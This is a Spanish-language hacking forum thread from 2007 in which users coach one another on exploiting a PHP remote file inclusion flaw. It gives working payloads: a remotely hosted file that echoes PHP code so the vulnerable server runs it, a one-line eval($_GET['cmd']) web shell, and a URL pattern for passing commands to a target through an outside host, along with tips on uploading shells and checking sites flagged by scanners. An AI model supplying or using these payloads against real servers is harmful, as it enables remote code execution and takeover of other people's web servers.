[?] File include

Iniciado por Rienzi, 20 Agosto 2007, 13:53 PM

0 Miembros y 1 Visitante están viendo este tema.

Rienzi

muchisimas gracias!!!!

WannaBeHacker

Cita de: yeikos en 20 Agosto 2007, 14:55 PM
En http://www.example.org/cn_config.php se debe de encontrar el codigo PHP que se ejecutará en la página vulnerable, por ejemplo:

Código (php) [Seleccionar]
<?php
echo "<?php phpinfo(); ?>
";
?>


En caso de que el archivo sea un documento de texto bastará con escribirlo sin más:

Código (php) [Seleccionar]
<?php phpinfo(); ?>

Pero si se supone que quieres que te funcione una shell por ejemplo , no tedría que ser
http://www.example.org/cn_config.txt? ??

Rienzi

#12
otra cosa , cual de todas las shells deberia funcionar en dicha vulnerabilidad ?? todas sirvirian?  deberia renombrarlas al igual que aparecen en security focus???
es normal que de error 500 al intentar ejecutarla¿? un saludo.

yeikos

WannaBeHacker, el archivo puede ser n_config.txt, archivo.php o file.html, lo importante es el contenido que contenga el archivo.

Un documento de texto o una página web (html) es lo más directo, porque tan solo tendremos que colocar el código a ejecutar, ya que es texto plano. En cambio si es un archivo PHP tendremos que imprimir como texto el código a incluir, por ejemplo, si archivo.php contiene:

Código (php) [Seleccionar]
<?php phpinfo(); ?>

Obtendremos como resultado la información de nuestro servidor, ya que
estaremos ejecutado phpinfo y el resultado de nuestro servidor será incluido en el servidor vulnerable, por lo tanto no estaremos ejecutando nada en dicho servidor.

En cambio el siguiente código imprime por pantalla <?php phpinfo(); ?>, que es lo que el servidor vulnerable incluirá mediante la función include/require:

Código (php) [Seleccionar]
<?php
echo "<?php phpinfo(); ?>
";
?>


Rienzi, las shells, que en realidad no lo son tanto, poseen diversas funciones que nos simplicaran el trabajo, no es necesario que las utilices, puedes crear la tuya, o simplemente ejecutar códigos directos en el servidor si no quieres complicaciones.

Rienzi

#14
jejeje muchas gracias por responder ahora cuando uso el

<?php
echo "<?php phpinfo(); ?>
";
?>


me da a descargar el archivo phplines de el servidor creo que puedo descargar cualquier archivo del server mmmm es eso??es que no me apareció config alguna jeje creo que se me escapa algo eso si cuando intento abrir el susodicho ar4chivo del server vulnerable me aparece completamente en blanco (abierto con block de notas).
Porcierto de que manera podria enviar comandos directamente? asi
www.vulnerable.com/vuln.php?page=http://www.host2.com/archivo.txt?cmd=[comando] ???

Pd: Creo que en vez de descargar archivos lo que hago es crearlos en el server vurln y descargarlos.

yeikos

Cita de: archivo.txt<?php
eval($_GET['cmd']);
?>

Revisa los temas anteriores, ya se ha hablado bastante sobre este fallo.

WannaBeHacker

Yeikos, muchísimas gracias por tu tiempo y tu explicación.
Por cierto, es que a mí este bug también me salto con el SSS hace un tiempo cuando realizé un scan, puede ser que el scan fuera un falso positivo verdad? Porque realizo el RFI y no ocurre nada... O que este fixeado???

yeikos

Nunca hay que fiarse al 100% de los escáneres, y menos los que van dirigidos a las aplicaciones Web. Si queréis comprobar si son realmente vulnerables hagan las pruebas ustedes mismos asignándo a la variable una URL; si se carga la página Web o se produce un error, posiblemente es vulnerable.